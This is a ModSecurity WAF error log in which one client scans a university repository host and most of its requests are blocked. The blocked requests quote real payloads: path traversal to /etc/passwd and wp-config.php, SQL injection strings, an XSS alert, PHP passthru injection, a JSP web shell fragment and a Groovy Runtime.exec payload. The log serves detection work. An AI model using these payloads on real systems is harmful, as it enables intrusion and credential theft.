[Tue Aug 29 11:47:28.375684 2023] [:error] [pid 2303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ff. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ff: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/knews/wysiwyg/fontpicker/"] [unique_id "ZO14YMCo-f0AAAj-eToAAAAE"]
[Tue Aug 29 11:47:31.494933 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:wp_abspath: ../../../wp-config.php\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO14Y8Co-f0AAAjav2cAAAAV"]
[Tue Aug 29 11:47:32.972929 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:FILECAMERA. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:FILECAMERA: ../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/wapopen"] [unique_id "ZO14ZMCo-f0AAAhl0KUAAAAi"]
[Tue Aug 29 11:47:34.554320 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:id: 1/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/fetchBody"] [unique_id "ZO14ZsCo-f0AAAfECE4AAAAO"]
[Tue Aug 29 11:47:37.373899 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14acCo-f0AAAjKyygAAAAQ"]
[Tue Aug 29 11:47:37.506369 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:car_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:car_id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/booking.php"] [unique_id "ZO14acCo-f0AAAjW9FwAAAAA"]
[Tue Aug 29 11:47:39.426278 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DB_DATABASE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');/* found within ARGS:DB_DATABASE: ');passthru('cat /etc/passwd');/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/install/install.php"] [unique_id "ZO14a8Co-f0AAAjav3oAAAAV"]
[Tue Aug 29 11:47:40.430529 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfh.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAjtc3AAAAAX"]
[Tue Aug 29 11:47:40.435416 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfh.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAjtc3AAAAAX"]
[Tue Aug 29 11:47:41.581440 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfh.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAkNPnAAAAAI"]
[Tue Aug 29 11:47:41.588880 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfh.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAkNPnAAAAAI"]
[Tue Aug 29 11:47:42.403641 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAjFoesAAAAF"]
[Tue Aug 29 11:47:42.534008 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAjFoe4AAAAF"]
[Tue Aug 29 11:47:43.735031 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') OR true-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14b8Co-f0AAAjtc3IAAAAX"]
[Tue Aug 29 11:47:44.367990 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/templates/default/html/windows/right.php"] [unique_id "ZO14cMCo-f0AAAjL8VwAAAAR"]
[Tue Aug 29 11:47:44.534124 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') AND false-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14cMCo-f0AAAhl0L4AAAAi"]
[Tue Aug 29 11:47:45.905292 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<%@ page import. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .*\\x22%>\\x0d\\x0a<%\\x0d\\x0a found within ARGS:<%@ page import: \\x22java.util.*,java.io.*\\x22%>\\x0d\\x0a<%\\x0d\\x0aif (request.getParameter(\\x22cmd\\x22) != null) {\\x0d\\x0a        out.println(\\x22Command: \\x22   request.getParameter(\\x22cmd\\x22)   \\x22<BR>\\x22);\\x0d\\x0a        Process p = Runtime.getRuntime().exec(request.getParameter(\\x22cmd\\x22));\\x0d\\x0a        OutputStream os = p.getOutputStream();\\x0d\\x0a        InputStream in = p.getInputStream();\\x0d\\x0a        DataInputStream dis = new D..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/poc.jsp/"] [unique_id "ZO14ccCo-f0AAAjCbLAAAAAB"]
[Tue Aug 29 11:47:47.228173 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/poc.jsp"] [unique_id "ZO14c8Co-f0AAAkdu20AAAAO"]
[Tue Aug 29 11:47:48.416682 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:files. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:files: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZO14dMCo-f0AAAkBKoMAAAAb"]
[Tue Aug 29 11:47:49.355736 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:phps_query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:phps_query: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/search"] [unique_id "ZO14dcCo-f0AAAkdu3kAAAAO"]
[Tue Aug 29 11:47:49.491622 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO14dcCo-f0AAAj119wAAAAa"]
[Tue Aug 29 11:47:49.568763 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dcCo-f0AAAi2yK8AAAAN"]
[Tue Aug 29 11:47:50.365010 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAjbw20AAAAW"]
[Tue Aug 29 11:47:50.415078 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-1-1180-2669-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/ebook/cart.php"] [unique_id "ZO14dsCo-f0AAAkdu34AAAAO"]
[Tue Aug 29 11:47:50.442180 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAjCbLkAAAAB"]
[Tue Aug 29 11:47:51.388976 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\r\\n  "name": "test"\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5cr\\x5cn  \\x22name\\x22: \\x22test\\x22\\x5cr\\x5cn}: {\\x0d\\x0a  \\x22name\\x22: \\x22test\\x22\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/website/blog/"] [unique_id "ZO14d8Co-f0AAAkBKo4AAAAb"]
[Tue Aug 29 11:47:51.459146 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-0-7303-1484-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/ebook/book.php"] [unique_id "ZO14d8Co-f0AAAjL8XQAAAAR"]
[Tue Aug 29 11:47:52.432485 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\\\"java.lang.Runtime\\\\").getRuntime().exec(\\\\"cat /etc/passwd\\\\").getText()"}}}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22size\\x22:1, \\x22script_fields\\x22: {\\x22lupin\\x22:{\\x22lang\\x22:\\x22groovy\\x22,\\x22script\\x22: \\x22java.lang.Math.class.forName(\\x5c\\x5c\\x22java.lang.Runtime\\x5c\\x5c\\x22).getRuntime().exec(\\x5c\\x5c\\x22cat /etc/passwd\\x5c\\x5c\\x22).getText()\\x22}}}: {size:1 script_fields: {lupin:{lang:groovy script: java.lang.math.class.forname(java.lang.runtime).getruntime().exec(cat/etc/passwd).gettext()}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [hostname "repositoryfh.unla.ac.id"] [uri "/_search"] [unique_id "ZO14eMCo-f0AAAjqDFgAAAAH"]
[Tue Aug 29 11:47:52.609417 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14eMCo-f0AAAjL8XgAAAAR"]
[Tue Aug 29 11:47:53.367665 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14ecCo-f0AAAhT4DsAAAAD"]
[Tue Aug 29 11:47:54.440941 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14esCo-f0AAAkAL90AAAAU"]
[Tue Aug 29 11:47:56.398868 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:guideState. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:guideState: {\\x22guideState\\x22:{\\x22guideDom\\x22:{},\\x22guideContext\\x22:{\\x22xsdRef\\x22:\\x22\\x22,\\x22guidePrefillXml\\x22:\\x22<afData>\\x5cu0041\\x5cu0042\\x5cu0043</afData>\\x22}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/content/2UdyWQdY5J32lAmsUBxLSfyO3WC.af.internalsubmit.json"] [unique_id "ZO14fMCo-f0AAAjav5YAAAAV"]
[Tue Aug 29 11:47:57.384888 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:adaptive-images-settings[source_file]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:adaptive-images-settings[source_file]: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZO14fcCo-f0AAAkdu5UAAAAO"]
[Tue Aug 29 11:47:58.452533 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../ found within ARGS:query: php://filter/resource=../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZO14fsCo-f0AAAjqDGMAAAAH"]
[Tue Aug 29 11:47:58.514220 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dw_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../.././../../../ found within ARGS:dw_file: ../../.././../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php/component/jemessenger/box_details"] [unique_id "ZO14fsCo-f0AAAjCbNUAAAAB"]
